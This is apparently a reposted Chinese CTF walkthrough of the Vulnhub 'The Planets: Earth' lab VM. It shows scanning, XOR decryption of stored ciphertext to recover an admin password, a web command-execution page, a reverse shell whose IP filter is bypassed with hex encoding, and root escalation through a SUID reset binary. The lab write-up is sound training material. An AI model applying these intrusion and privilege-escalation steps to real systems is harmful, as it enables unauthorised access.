Vulnhub-THE PLANETS: EARTH_vulhub the-planets-earth-CSDN博客

原文：http://www.valesec.top/archives/theplanetsearth

THE PLANETS: EARTH

靶机描述

 Difficulty: Easy
 
 Earth is an easy box though you will likely find it more challenging than "Mercury" in this series and on the harder side of easy, depending on your experience. There are two flags on the box: a user and root flag which include an md5 hash. This has been tested on VirtualBox so may not work correctly on VMware. Any questions/issues or feedback please email me at: SirFlash at protonmail.com, though it may take a while for me to get back to you.

这里我们使用 VirtualBox 导入靶场环境

主机发现

 # root @ kali in ~ [10:43:57]
 $ arp-scan -I eth1 192.168.56.0/24
 Interface: eth1, type: EN10MB, MAC: 00:0c:29:7f:7c:c9, IPv4: 192.168.56.104
 Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
 192.168.56.1    0a:00:27:00:00:10       (Unknown: locally administered)
 192.168.56.100  08:00:27:46:82:fe       PCS Systemtechnik GmbH
 192.168.56.106  08:00:27:b9:35:aa       PCS Systemtechnik GmbH

端口扫描

 # root @ kali in ~ [10:44:09]
 $ nmap -A 192.168.56.106
 Starting Nmap 7.92 ( https://nmap.org ) at 2021-11-13 10:44 EST
 Nmap scan report for 192.168.56.106
 Host is up (0.00059s latency).
 Not shown: 987 filtered tcp ports (no-response), 10 filtered tcp ports (admin-prohibited)
 PORT    STATE SERVICE  VERSION
 22/tcp  open  ssh      OpenSSH 8.6 (protocol 2.0)
 | ssh-hostkey:
 |   256 5b:2c:3f:dc:8b:76:e9:21:7b:d0:56:24:df:be:e9:a8 (ECDSA)
 |_  256 b0:3c:72:3b:72:21:26:ce:3a:84:e8:41:ec:c8:f8:41 (ED25519)
 80/tcp  open  http     Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
 |_http-title: Bad Request (400)
 |_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
 443/tcp open  ssl/http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9)
 | http-methods:
 |_  Potentially risky methods: TRACE
 |_http-title: Test Page for the HTTP Server on Fedora
 | ssl-cert: Subject: commonName=earth.local/stateOrProvinceName=Space
 | Subject Alternative Name: DNS:earth.local, DNS:terratest.earth.local
 | Not valid before: 2021-10-12T23:26:31
 |_Not valid after:  2031-10-10T23:26:31
 | tls-alpn:
 |_  http/1.1
 |_ssl-date: TLS randomness does not represent time
 |_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9
 MAC Address: 08:00:27:B9:35:AA (Oracle VirtualBox virtual NIC)
 Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
 Device type: general purpose
 Running: Linux 4.X|5.X
 OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
 OS details: Linux 4.15 - 5.6, Linux 5.0 - 5.4

这里我访问 Web 页面，发现页面不正常，然后根据端口扫描信息添加 hosts 信息

 # root @ kali in ~ [20:21:14] 
 $ cat /etc/hosts | grep "earth"
 192.168.56.106  earth.local
 192.168.56.106  terratest.earth.local

再次访问，可以看到站点加载正常

路径扫描

terratest.earth.local

 # root @ kali in ~ [9:10:51] 
 $ dirb https://terratest.earth.local/                                                    
 ---- Scanning URL: https://terratest.earth.local/ ----
 + https://terratest.earth.local/cgi-bin/ (CODE:403|SIZE:199)                                                                                
 + https://terratest.earth.local/index.html (CODE:200|SIZE:26)                                                                               
 + https://terratest.earth.local/robots.txt (CODE:200|SIZE:521)      
 END_TIME: Sat Nov 13 10:58:16 2021
 DOWNLOADED: 4612 - FOUND: 3

这里发现了一个 robots.txt 信息，查看该文件

这里发现在最后一条中还存在一个特殊的禁用值：/testingnotes.* ，这里简单写个脚本进行测试

 #!/usr/bin/python3
 # -*- coding: utf-8 -*- 
 # --author：valecalida--
 import requests
 from requests.packages.urllib3.exceptions import InsecureRequestWarning
 requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
 
 url = "https://terratest.earth.local/"
 prefix = 'testingnotes'
 suffix = [".asp", ".aspx", ".bat", ".c", ".cfm", ".cgi", ".com", ".dll", ".exe", ".htm", ".html", ".inc", ".jhtml",
           ".jsa", ".json", ".jsp", ".log", ".mdb", ".nsf", ".php", ".phtml", ".pl", ".reg", ".sh", ".sql", ".txt",
           ".xml"]
 for i in suffix:
     new_url = url + prefix + i
     res = requests.get(new_url, verify=False)
     if res.status_code == 200:
         print("[+] %s is exist!" % new_url)

查看该前缀为：testingnotes 存在什么后缀，testingnotes.txt

 # root @ kali in ~/Desktop [20:45:27] 
 $ python3 example.py
 [+] https://terratest.earth.local/testingnotes.txt is exist!

访问该文件，得到了新的内容

这里我们得到了新的信息，加密算法是 XOR ，存在 testdata.txt， admin 用户是：terra，先访问 testdata.txt 并保存

earth.local

 # root @ kali in ~/Desktop [20:53:56] C:2
 $ dirb https://earth.local/
 ---- Scanning URL: https://earth.local/ ----
 + https://earth.local/admin (CODE:301|SIZE:0)                                                                                                                             
 + https://earth.local/cgi-bin/ (CODE:403|SIZE:199)          
 END_TIME: Sat Nov 13 20:54:15 2021
 DOWNLOADED: 4612 - FOUND: 2

这里检测到了两个路径，访问 https://earth.local/admin

下面存在以前使用的数据

37090b59030f11060b0a1b4e0000000000004312170a1b0b0e4107174f1a0b044e0a000202134e0a161d17040359061d43370f15030b10414e340e1c0a0f0b0b061d430e0059220f11124059261ae281ba124e14001c06411a110e00435542495f5e430a0715000306150b0b1c4e4b5242495f5e430c07150a1d4a410216010943e281b54e1c0101160606591b0143121a0b0a1a00094e1f1d010e412d180307050e1c17060f43150159210b144137161d054d41270d4f0710410010010b431507140a1d43001d5903010d064e18010a4307010c1d4e1708031c1c4e02124e1d0a0b13410f0a4f2b02131a11e281b61d43261c18010a43220f1716010d40

3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45
2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a

这里写个简单脚本，与 testdata.txt 进行一下 XOR 运算，得到密钥

 #!/usr/bin/python3
 # -*- coding: utf-8 -*- 
 # --author：valecalida--
 # Edit time: 2021/11/14 9:57
 import binascii
 data1 = "2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a"
 f = binascii.b2a_hex(open('testdata.txt', 'rb').read()).decode()
 print(hex(int(data1,16) ^ int(f,16)))
 # 运行结果为
 0x6561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174

这里密钥是重复的，所以只需要选一段即可

然后使用用户名 terra ，密码：earthclimatechangebad4humans 登录 https://earth.local/admin

然后进入到了一处可进行命令执行的页面

user_flag

在 /var/earth_web/user_flag.txt 找到了第一个 flag信息

root_flag

接着反弹个 shell ，这里直接使用 IP 地址进行反弹时会报错

这里使用 16 进制编码来绕过，可以看到 shell 反弹成功

然后查找高权限的命令

 bash-5.1$ find / -perm -u=s -type f 2>/dev/null
 find / -perm -u=s -type f 2>/dev/null
 /usr/bin/chage
 /usr/bin/gpasswd
 /usr/bin/newgrp
 /usr/bin/su
 /usr/bin/mount
 /usr/bin/umount
 /usr/bin/pkexec
 /usr/bin/passwd
 /usr/bin/chfn
 /usr/bin/chsh
 /usr/bin/at
 /usr/bin/sudo
 /usr/bin/reset_root
 /usr/sbin/grub2-set-bootflag
 /usr/sbin/pam_timestamp_check
 /usr/sbin/unix_chkpwd
 /usr/sbin/mount.nfs
 /usr/lib/polkit-1/polkit-agent-helper-1

这里发现了奇怪的 /usr/bin/reset_root ，直接使用 strings 查看

 bash-5.1$ strings /usr/bin/reset_root
 strings /usr/bin/reset_root
 /lib64/ld-linux-x86-64.so.2
 setuid
 puts
 system
 access
 __libc_start_main
 libc.so.6
 GLIBC_2.2.5
 __gmon_start__
 H=@@@
 paleblueH
 ]\UH
 credentiH
 als rootH
 :theEartH
 hisflat
 []A\A]A^A_
 CHECKING IF RESET TRIGGERS PRESENT...
 RESET TRIGGERS ARE PRESENT, RESETTING ROOT PASSWORD TO: Earth
 /usr/bin/echo 'root:Earth' | /usr/sbin/chpasswd
 RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.

这里使用 nc 将文件传输出来，然后查看运行失败的原因

然后赋予运行权限，追踪一下运行时报错信息

 # root @ kali in /tmp [23:17:05] 
 $ ltrace ./reset_root
 puts("CHECKING IF RESET TRIGGERS PRESE"...CHECKING IF RESET TRIGGERS PRESENT...
 )                  = 38
 access("/dev/shm/kHgTFI5G", 0)                               = -1
 access("/dev/shm/Zw7bV9U5", 0)                               = -1
 access("/tmp/kcM0Wewe", 0)                                   = -1
 puts("RESET FAILED, ALL TRIGGERS ARE N"...RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.
 )                  = 44
 +++ exited (status 0) +++

这里发现了三个文件，在目标靶机上都不存在

 bash-5.1$ ls /dev/shm/
 ls /dev/shm/
 bash-5.1$ ls /tmp/
 ls /tmp/

于是创建这三个文件

 bash-5.1$ touch /dev/shm/kHgTFI5G
 touch /dev/shm/kHgTFI5G
 bash-5.1$ touch /dev/shm/Zw7bV9U5
 touch /dev/shm/Zw7bV9U5
 bash-5.1$ touch /tmp/kcM0Wewe
 touch /tmp/kcM0Wewe

再尝试运行 reset_root 这个指令，发现获取到了 root 权限，并得到了 flag 信息

 bash-5.1$ /usr/bin/reset_root
 /usr/bin/reset_root
 CHECKING IF RESET TRIGGERS PRESENT...
 RESET TRIGGERS ARE PRESENT, RESETTING ROOT PASSWORD TO: Earth
 bash-5.1$ su
 su
 Password: Earth
 
 ls
 bin
 boot
 dev
 etc
 home
 lib
 lib64
 media
 mnt
 opt
 proc
 root
 run
 sbin
 srv
 sys
 tmp
 usr
 var
 ls /root
 anaconda-ks.cfg
 root_flag.txt
 cat /root/root_flag.txt
 
               _-o#&&*''''?d:>b\_
           _o/"`''  '',, dMF9MMMMMHo_
        .o&#'        `"MbHMMMMMMMMMMMHo.
      .o"" '         vodM*$&&HMMMMMMMMMM?.
     ,'              $M&ood,~'`(&##MMMMMMH\
    /               ,MMMMMMM#b?#bobMMMMHMMML
   &              ?MMMMMMMMMMMMMMMMM7MMM$R*Hk
  ?$.            :MMMMMMMMMMMMMMMMMMM/HMMM|`*L
 |               |MMMMMMMMMMMMMMMMMMMMbMH'   T,
 $H#:            `*MMMMMMMMMMMMMMMMMMMMb#}'  `?
 ]MMH#             ""*""""*#MMMMMMMMMMMMM'    -
 MMMMMb_                   |MMMMMMMMMMMP'     :
 HMMMMMMMHo                 `MMMMMMMMMT       .
 ?MMMMMMMMP                  9MMMMMMMM}       -
 -?MMMMMMM                  |MMMMMMMMM?,d-    '
  :|MMMMMM-                 `MMMMMMMT .M|.   :
   .9MMM[                    &MMMMM*' `'    .
    :9MMk                    `MMM#"        -
      &M}                     `          .-
       `&.                             .
         `~,   .                     ./
             . _                  .-
               '`--._,dd###pp=""'
 
 Congratulations on completing Earth!
 If you have any feedback please contact me at SirFlash@protonmail.com
 [root_flag_b0da9554d29db2117b02aa8b66ec492e]

最终的 flag 信息为：

 root_flag_b0da9554d29db2117b02aa8b66ec492e

文章借鉴：

 https://blog.gibbons.digital/hacking/2021/11/09/earth.html